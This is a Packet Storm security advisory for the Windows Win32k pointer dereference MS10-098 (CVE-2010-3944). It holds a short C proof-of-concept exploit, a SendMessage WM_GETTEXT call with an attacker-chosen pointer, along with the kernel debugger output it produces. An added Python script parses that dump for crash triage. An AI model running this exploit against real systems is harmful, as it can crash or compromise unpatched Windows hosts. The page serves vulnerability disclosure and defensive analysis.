Packet Storm | Stefan Le Berre | PACKETSTORM:96783
History: Dec 17, 2010 - 12:00 a.m.

Windows Win32k Pointer Dereference


EPSS: 0.001 (percentile: 17.7%)

```c
/*************************************************************************************
 * MS10-098
 * CVE-2010-3944
 *
 * Microsoft Windows Win32k pointer dereference
 *
 * --------------------
 * Affected Software
 * --------------------
 * Microsoft Windows 7 / 2008
 *
 *
 * --------------------
 * Consequences
 * --------------------
 * An unprivileged user may be able to cause a bugcheck, or possibly execute
 * arbitrary code by CSRSS.EXE.
 *
 *
 *
 * Credits  : Stefan LE BERRE ([email protected])
 *            Ludo t0ka7a
 *
 * WebSites : http://www.sysdream.com/
 *            http://ghostsinthestack.org/
 *            http://infond.blogspot.com/
 *            http://twitter.com/hackinparis
 *
 * kd> r
 * eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
 * eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
 * cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
 * win32k!xxxRealDefWindowProc+0xf6:
 * 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
 *
 *************************************************************************************/

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>


int main(int argc, char *argv[])
{
    /* Message 13 (0x0D) is WM_GETTEXT: wParam is the buffer size, lParam the buffer pointer. */
    /* 0x13370 is the dereferenced pointer and 16 is the window handle of class #32769. */
    SendMessage((HWND) 16, (UINT) 13, 0x80000000, 0x00013370);
    return 0;
}
```
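For crash triage, the `kd> r` output quoted in the header comment can be classified mechanically as a ring-0 write to a user-mode address. This is an added example, not part of the original advisory; the function name `triage` and the `0x80000000` user/kernel boundary (default 32-bit layout) are assumptions, and the input is the register dump from the page embedded as a sample.

```python
import re

# Sample input: the kd output quoted in the advisory's header comment.
KD_DUMP = """\
kd> r
eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
win32k!xxxRealDefWindowProc+0xf6:
8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
"""

USER_LIMIT = 0x80000000  # assumption: default 2 GB user / 2 GB kernel split


def triage(dump):
    """Summarise a kd register dump; return None if it cannot be parsed."""
    # Tolerate the "* " prefix the dump carries inside a C comment.
    text = "\n".join(line.lstrip("* ").strip() for line in dump.splitlines())
    regs = {k: int(v, 16)
            for k, v in re.findall(r"\b([a-z]{2,3})=([0-9a-f]{4,8})\b", text)}
    sym = re.search(r"^(\w+!\w+)\+0x[0-9a-f]+:$", text, re.M)
    # Faulting instruction: address, opcode bytes, mnemonic, operands, seg:sel:addr=value
    ins = re.search(r"^[0-9a-f]{8} [0-9a-f]+\s+(\w+)\s+(.+?)\s+"
                    r"\w\w:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", text, re.M)
    if not (sym and ins and "cs" in regs):
        return None
    mnemonic, operands, addr, value = ins.groups()
    dest = operands.split(",")[0]          # first operand is the destination
    target = int(addr, 16)
    return {
        "symbol": sym.group(1),
        "target": target,
        "kernel_mode": regs["cs"] & 3 == 0,               # RPL 0 means ring 0
        "writes_memory": mnemonic == "mov" and "[" in dest,  # heuristic: mov only
        "user_target": target < USER_LIMIT,
        "unmapped": value == "??",                        # kd could not read it
        "source_regs": sorted(r for r, v in regs.items()
                              if v == target and r != "eip"),
    }


if __name__ == "__main__":
    print(triage(KD_DUMP))
```

A result with `kernel_mode`, `writes_memory` and `user_target` all true, and `source_regs` naming the register that carried the address, is the pattern to escalate when it appears in a bugcheck from an unpatched host.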